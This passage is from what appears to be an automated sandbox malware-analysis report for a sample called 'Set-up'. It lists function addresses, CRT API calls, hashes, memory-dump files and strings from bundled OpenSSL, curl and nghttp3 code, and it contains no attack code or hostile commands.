                                • Opcode Fuzzy Hash: 5046d603a94fd3252230c88e938c23c6d318e10f91fc871fa2bda040c97fa93c
                                • Instruction Fuzzy Hash: 1FD193B16042149BCB14EF2CC984AAE7BE1BF88314F154A2EFC5987391D7B4EC41CB99
                                Function 002C81F0 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 198stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,0026A9CE,000000D2), ref: 002C83A3
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0026A9CE), ref: 002C83C6
                                  • Part of subcall function 002C60E0: GetLastError.KERNEL32(002C7CCC,?,00000000,002C7127,002C7CCC,00000000,002ECAB7,00111A70), ref: 002C60E3
                                  • Part of subcall function 002C60E0: SetLastError.KERNEL32(00000000), ref: 002C61A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$strcpystrlen
                                • String ID: crypto/err/err_local.h
                                • API String ID: 542397150-344804083
                                • Opcode ID: 231bcf060da88086aa08c061d8bacaad75574139127562d23c1899331f8f21e6
                                • Instruction ID: 30af4ad794e548e83ed22b2c55f4620b6c5b4d9e93373388c068036d8599ba34
                                • Opcode Fuzzy Hash: 231bcf060da88086aa08c061d8bacaad75574139127562d23c1899331f8f21e6
                                • Instruction Fuzzy Hash: E88187B1510B469FE7238F19E885BE2B7D0FF4030CF448A1DE995872A5EB79A434CB51
                                Function 00116730 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 179stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001173F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0011CA95,006E9AB8,00000467,mprintf.c), ref: 0011741D
                                  • Part of subcall function 001173F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00117445
                                  • Part of subcall function 001547D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 001547FB
                                  • Part of subcall function 001547D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0015480C
                                  • Part of subcall function 001547D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00154837
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00116844
                                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00116876
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 001168FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$feoffgetsmemcmpmemcpy
                                • String ID: %256s "%64[^"]"$hsts.c$unlimited
                                • API String ID: 288886899-2895786126
                                • Opcode ID: e36352199180df2bd61c380ae7fcd49b59bc1530369b7af2356c381af403ba50
                                • Instruction ID: 38a5c09eeb75091ea6c5fc730b5893aa746e61c788e07b01a9e7e7a26de4763c
                                • Opcode Fuzzy Hash: e36352199180df2bd61c380ae7fcd49b59bc1530369b7af2356c381af403ba50
                                • Instruction Fuzzy Hash: 21513D71945341BFDB189B249C42AAB76959F65704F14083CFC48A72C3FB36DA85C7A3
                                Function 00308240 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 63stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00309265,?,00000400,00000000,?), ref: 00308254
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00309265,?), ref: 00308264
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00309265,?,?,?,?,?,?,00309265,?,00000400,00000000,?), ref: 003082C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpymemsetstrlen
                                • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                                • API String ID: 160209724-3271887637
                                • Opcode ID: 9ab89b393509b280e3562f513ae9baed2de3ef3f5999abe0bafe7bb6e713a09c
                                • Instruction ID: 14eb266a57f70cc0242475a1631dce5b019a2913e888fd0d6c5761605dd78f51
                                • Opcode Fuzzy Hash: 9ab89b393509b280e3562f513ae9baed2de3ef3f5999abe0bafe7bb6e713a09c
                                • Instruction Fuzzy Hash: 13012DE670531137EA107569BC83F6B2A4CCB917A9F08053EFE04E21C3EA55EC1555B6
                                Function 001B8920 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001B895D
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B8991
                                • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B899A
                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 001B89AB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001B89B4
                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 001B89B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_fileno_writeabortfreemalloc
                                • String ID:
                                • API String ID: 1064163434-0
                                • Opcode ID: 408c16d5ee7fe2d9d0f2fdc6e30b45ec9a9249864bbf06c77cc95b5efdb05d46
                                • Instruction ID: 3605c5c3eace6b9cc1fe0b82722e2851a25133e9ef1a3af8a904a8eb45d88554
                                • Opcode Fuzzy Hash: 408c16d5ee7fe2d9d0f2fdc6e30b45ec9a9249864bbf06c77cc95b5efdb05d46
                                • Instruction Fuzzy Hash: BD1192B44093109BD740AF2A858462EFBE8BF99B48F41492EF9C883341EB749944CF93
                                Function 00498920 Relevance: 9.0, APIs: 6, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00498928
                                • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049893D
                                • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 00498942
                                • __p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049894F
                                • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 0049895C
                                • _set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,0011115A), ref: 00498972
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_initialize_narrow_environment_set_new_mode
                                • String ID:
                                • API String ID: 3593706420-0
                                • Opcode ID: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                • Instruction ID: 57cced812a37d1047887f4b42c6bc0ea65a9352ce9449f4de6686b32b9685a6f
                                • Opcode Fuzzy Hash: 1efc63e94736ec762dde092320e3d59adf545601741b22b2780315d7096a2df3
                                • Instruction Fuzzy Hash: B1F0B7746147408FCB00BF7DC48181A7BE0AF9A318F504AADF5909B362DA39D9419F96
                                Function 001745C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 259COMMON
                                Download Yara Rule
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00145B6B,00000017,?,?), ref: 00174612
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00174660
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errnomemchr
                                • String ID: 0123456789ABCDEF$0123456789abcdef
                                • API String ID: 4119152314-885041942
                                • Opcode ID: ac6f5a8deb80cb9447603a4f7db31bf4c2c5d62d57c698b5df912ab3255717e2
                                • Instruction ID: b4b5944a02b1c2398b4adfaff5bb30cf33900660ddf357f587b58b0027781f07
                                • Opcode Fuzzy Hash: ac6f5a8deb80cb9447603a4f7db31bf4c2c5d62d57c698b5df912ab3255717e2
                                • Instruction Fuzzy Hash: 3591F275A083458BD728DE6CC84027AB7F2AFD6314F19CA2DE9DD87381DB359D848B42
                                Function 00162250 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148stringCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0016225F
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 001622CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _time64strlen
                                • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                                • API String ID: 3014104814-1335658360
                                • Opcode ID: e53922ce9046ca4ce7984e52c357c2c889c4d2a19746d6fe8878586ef3f76696
                                • Instruction ID: 7daec466a094138336dc2f5b165bbe9108d2f2979450391de066de317ec087f1
                                • Opcode Fuzzy Hash: e53922ce9046ca4ce7984e52c357c2c889c4d2a19746d6fe8878586ef3f76696
                                • Instruction Fuzzy Hash: 4941E671A007045BD7249A28DC85B7BB7D5BF94319F08443CEE9AC7382EB39AC65C691
                                Function 001C06F0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 117COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,001C0307,?), ref: 001C07AE
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C07C3
                                Strings
                                • ctx->next_absidx > absidx, xrefs: 001C07A9
                                • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 001C07BE
                                • nghttp3_qpack.c, xrefs: 001C07A4, 001C07B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                                • API String ID: 1222420520-241347991
                                • Opcode ID: cab616e2ba350f5e27ba30af674ccda6d98213bed5b9029336c5f6e51029c0b7
                                • Instruction ID: dd00878e6132eaf9b8d7cbc22f05d3ece721c1201f2165d4e86d91a467f248b4
                                • Opcode Fuzzy Hash: cab616e2ba350f5e27ba30af674ccda6d98213bed5b9029336c5f6e51029c0b7
                                • Instruction Fuzzy Hash: 7F31B1B5B00704AFD315EA28DC81F6B73E5BFA9714F05852CF98597282E730F85587A2
                                Function 00494610 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116fileCOMMON
                                Download Yara Rule
                                APIs
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00125FB6,?), ref: 00494645
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 00494698
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,007F1278), ref: 00494744
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00494762
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _stat64$fclosefopen
                                • String ID: ../list/public_suffix_list.dat
                                • API String ID: 1085753941-141370353
                                • Opcode ID: c5c4daaa39a3b53cac719e18a426b5554cf0fbf1419ababfedbc268ff67224ff
                                • Instruction ID: 26ff320a5f8446646b40514f8f5a15643da1890fba281b04f4d92ef88caac392
                                • Opcode Fuzzy Hash: c5c4daaa39a3b53cac719e18a426b5554cf0fbf1419ababfedbc268ff67224ff
                                • Instruction Fuzzy Hash: E3417CB1A083459BCB00CF98D440B5BBBE5ABC5758F15483EE984D7340D778ED4ACB9A
                                Function 001BE990 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON
                                Download Yara Rule
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_ksl_it_get(&it) == stream,nghttp3_qpack.c,000008ED,?,?,?,?,?,?,?,00000000,00000000,00000000,?,001BEF0E,?), ref: 001BEA23
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(!nghttp3_ksl_it_end(&it),nghttp3_qpack.c,000008EC,?,?,?,?,?,?,?,00000000,00000000,00000000,?,001BEF0E,?), ref: 001BEA38
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: !nghttp3_ksl_it_end(&it)$nghttp3_ksl_it_get(&it) == stream$nghttp3_qpack.c
                                • API String ID: 1222420520-1964160224
                                • Opcode ID: 0401de43f0d0ee6af377337d4a6eb7e9c6c3521cd269470827f9597ae1386039
                                • Instruction ID: 454ae5d8fc1e42077451d3b656f0ba68bfc014ca82bdec20ba331d87ab661029
                                • Opcode Fuzzy Hash: 0401de43f0d0ee6af377337d4a6eb7e9c6c3521cd269470827f9597ae1386039
                                • Instruction Fuzzy Hash: 4A319F76904309AFD710DE54DC81EDBB7BCFF95768F008519F8985B292E730A944CBA2
                                Function 00182680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00182771
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
